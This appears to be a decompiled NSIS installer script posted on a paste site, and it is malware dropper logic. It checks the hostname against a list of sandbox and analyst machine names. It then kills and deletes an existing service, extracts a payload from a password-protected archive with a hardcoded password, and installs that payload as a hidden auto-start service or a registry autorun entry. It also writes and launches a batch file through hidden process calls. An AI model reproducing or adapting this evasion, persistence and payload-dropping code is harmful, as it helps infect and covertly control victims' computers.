- IntCmp 398 117 1105 0 0 0
- Goto 1178
- Push ‹€
- Push GUMRD-PC
- Call 322
- Pop $R0
- IntCmp 398 117 1111 0 0 0
- Goto 1178
- Push ‹€
- Push ITYTS-PC
- Call 322
- Pop $R0
- IntCmp 398 117 1117 0 0 0
- Goto 1178
- Push ‹€
- Push OIYKL-PC
- Call 322
- Pop $R0
- IntCmp 398 117 1123 0 0 0
- Goto 1178
- Push ‹€
- Push VQK4F8-PC
- Call 322
- Pop $R0
- IntCmp 398 117 1129 0 0 0
- Goto 1178
- Push ‹€
- Push WZUKB-PC
- Call 322
- Pop $R0
- IntCmp 398 117 1135 0 0 0
- Goto 1178
- Push ‹€
- Push Y2YGZSHVNDTS-PC
- Call 322
- Pop $R0
- IntCmp 398 117 1141 0 0 0
- Goto 1178
- Push ‹€
- Push LUSER-PC
- Call 322
- Pop $R0
- IntCmp 398 117 1147 0 0 0
- Goto 1178
- Push ‹€
- Push ABBY-PC
- Call 322
- Pop $R0
- IntCmp 398 117 1153 0 0 0
- Goto 1178
- Push ‹€
- Push ADMINIS
- Call 322
- Pop $R0
- IntCmp 398 117 1159 0 0 0
- Goto 1178
- Push ‹€
- Push RATS
- Call 322
- Pop $R0
- IntCmp 398 117 1165 0 0 0
- Goto 1178
- Push ‹€
- Push PUBLIC-
- Call 322
- Pop $R0
- IntCmp 398 117 1171 0 0 0
- Goto 1178
- Push ‹€
- Push ABC-
- Call 322
- Pop $R0
- IntCmp 398 117 1177 0 0 0
- Goto 1178
- Goto 1180
- StrCpy $R0 "TRUE"
- Goto 1181
- StrCpy $R0 "FALSE"
- Pop $R1
- Return
- Call 406
- StrCmp "Š€" "TRUE" 0 1186 0
- Goto 1211
- Call 343
- StrCmp "Š€" "TRUE" 0 1189 0
- Goto 1211
- Call 641
- StrCmp "Š€" "TRUE" 0 1192 0
- Goto 1211
- Call 730
- StrCmp "Š€" "TRUE" 0 1195 0
- Goto 1211
- Call 849
- StrCmp "Š€" "TRUE" 0 1198 0
- Goto 1211
- Call 371
- StrCmp "Š€" "TRUE" 0 1201 0
- Goto 1211
- Call 441
- StrCmp "Š€" "TRUE" 0 1204 0
- Goto 1211
- Call 540
- StrCmp "Š€" "TRUE" 0 1207 0
- Goto 1211
- Call 926
- StrCmp "Š€" "TRUE" 0 1210 0
- Goto 1211
- Goto 1213
- StrCpy $R0 "TRUE"
- Goto 1214
- StrCpy $R0 "FALSE"
- Return
- SetOutPath ™€
- SetFlag 2 117
- Call 1183
- StrCmp "Š€" "TRUE" 0 1220 0
- Goto 1306
- SetOutPath ™€
- SetFlag 2 117
- ReadRegStr 16 2147483649 4245 4259 0
- ReadRegStr 17 2147483649 4245 4267 0
- ReadRegStr 18 2147483649 4245 4271 0
- ReadRegStr 19 2147483649 4245 4278 0
- Call 1400
- File š€\nsExec.dll
- SetFlag 13 0
- Push cmd /c net stop € /y
- RegisterDLL š€\nsExec.dll Exec 0
- Call 1400
- File š€\nsExec.dll
- SetFlag 13 0
- Push cmd /c sc delete €
- RegisterDLL š€\nsExec.dll Exec 0
- Call 1400
- File š€\nsExec.dll
- SetFlag 13 0
- Push cmd /c taskkill /f /im "“€"
- RegisterDLL š€\nsExec.dll Exec 0
- DelReg 0 2147483649 4379 4425
- Delete ’€\“€
- Call 1400
- File š€\UserInfo.dll
- SetFlag 13 0
- RegisterDLL š€\UserInfo.dll GetAccountType 0
- Pop $R5
- StrCmp "€" "Admin" 1249 1283 0
- WriteReg 2147483649 4245 4259 4479 1
- WriteReg 2147483649 4245 4267 4488 1
- WriteReg 2147483649 4245 4271 4497 1
- WriteReg 2147483649 4245 4278 4519 1
- ReadRegStr 16 2147483649 4245 4259 0
- ReadRegStr 17 2147483649 4245 4267 0
- ReadRegStr 18 2147483649 4245 4271 0
- ReadRegStr 19 2147483649 4245 4278 0
- SetOutPath š€
- File 7za.exe
- File archive.7z
- Call 1400
- File š€\nsExec.dll
- SetFlag 13 0
- Push 7za.exe x archive.7z -pX9e5UD6AN1vQCK08DM4O -o"’€" -aoa
- RegisterDLL š€\nsExec.dll Exec 0
- Rename ’€\archive.cab ’€\“€ 0
- IfFileExists ’€\“€ 0 1306
- Call 1400
- File š€\nsExec.dll
- SetFlag 13 0
- Push sc create € binpath= "’€\“€ -service" type= own start= auto displayname= ""
- RegisterDLL š€\nsExec.dll Exec 0
- Call 1400
- File š€\nsExec.dll
- SetFlag 13 0
- Push sc description € ""
- RegisterDLL š€\nsExec.dll Exec 0
- Call 1400
- File š€\nsExec.dll
- SetFlag 13 0
- Push net start € /y
- RegisterDLL š€\nsExec.dll Exec 0
- Goto 1306
- WriteReg 2147483649 4245 4259 4479 1
- WriteReg 2147483649 4245 4267 4488 1
- WriteReg 2147483649 4245 4271 4497 1
- WriteReg 2147483649 4245 4278 4519 1
- ReadRegStr 16 2147483649 4245 4259 0
- ReadRegStr 17 2147483649 4245 4267 0
- ReadRegStr 18 2147483649 4245 4271 0
- ReadRegStr 19 2147483649 4245 4278 0
- SetOutPath š€
- File 7za.exe
- File archive.7z
- Call 1400
- File š€\nsExec.dll
- SetFlag 13 0
- Push 7za.exe x archive.7z -pX9e5UD6AN1vQCK08DM4O -o"’€" -aoa
- RegisterDLL š€\nsExec.dll Exec 0
- IfFileExists ’€\“€ 0 1306
- WriteReg 2147483649 4379 4425 4429 1
- Call 1400
- File š€\nsExec.dll
- SetFlag 13 0
- Push cmd /c start "" "’€\“€"
- RegisterDLL š€\nsExec.dll Exec 0
- Return
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::CreateMutexA(i 0, i 0, t "‚€") i .r1 ?e
- RegisterDLL š€\System.dll Call 0
- Pop $R0
- StrCmp "Š€" "0" 1315 0 0
- Abort
- Return
- StrCpy $R3 "›€"
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetShortPathName(t R3, t.R3,i 1024)
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetTempPathA(i 1024, t .R0) i .r2
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetShortPathName(t R0, t.R0,i 1024)
- RegisterDLL š€\System.dll Call 0
- StrCpy $R0 "Š€1.bat"
- FileOpen 11 1073741824 2 398
- FileWrite 11 4994 0
- FileWrite 11 5001 0
- FileWrite 11 5028 0
- FileWrite 11 5038 0
- FileWrite 11 5062 0
- FileClose 11
- Push Š€
- Call 1343
- Goto 1398
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push S
- RegisterDLL š€\System.dll Store 0
- Push error
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push 72
- RegisterDLL š€\System.dll Alloc 0
- Pop $2
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push *‚€(i72)
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push *(i,i,i,i)i.r3
- RegisterDLL š€\System.dll Call 0
- Exch
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::CreateProcess(i0, ts, i0, i0, i0, i0x8000000, i0, i0, ir2, ir3)i.r4
- RegisterDLL š€\System.dll Call 0
- Pop $6
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetExitCodeProcess(ir4, *i.s)
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::CloseHandle(ir4)
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ‚€
- RegisterDLL š€\System.dll Free 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ƒ€
- RegisterDLL š€\System.dll Free 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push L
- RegisterDLL š€\System.dll Store 0
- Return
- Pop $0
- Return
- SetFlag 13 115
- StrCmp "š€" "" 0 1410 0
- Push €€
- SetFlag 2 0
- GetTempFileName ™€
- Delete 8 €€
- SetOutPath €€
- IfFlag 1411 0 2 0
- StrCpy $PLUGINSDIR "€€"
- Pop $0
- Return
- MessageBox 2097168 5257 0 0 0
- Quit
- Return
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement